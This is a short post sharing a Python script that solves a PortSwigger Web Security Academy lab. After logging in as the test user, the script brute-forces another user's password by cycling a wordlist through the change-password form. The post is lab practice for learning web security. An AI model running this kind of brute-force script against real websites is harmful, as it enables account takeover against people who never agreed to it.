The code I used to solve a portswigger lab about brute-forcing password.

brute_force.py

import requests

session = requests.Session()


def login():
    url = "https://ac291fbf1e82ce2980c4012800f4005b.web-security-academy.net/login"
    payload = {
        'username': 'wiener',
        'password': 'a'
    }
    response = session.post(url=url, data=payload, allow_redirects=False)
    print(response.status_code)

def change_password(username, old_password):
    url = "https://ac291fbf1e82ce2980c4012800f4005b.web-security-academy.net/my-account/change-password"
    payload = {
    "username": username,
    "current-password": old_password,
    "new-password-1": "a",
    "new-password-2": "a"
    }
    response = session.post(url=url, data=payload, allow_redirects=False)
    print(response.status_code)

if __name__ == '__main__':
    passwords = open('password.txt', 'r').read().split('\n')
    
    for p in passwords:
        login()
        change_password("carlos", p)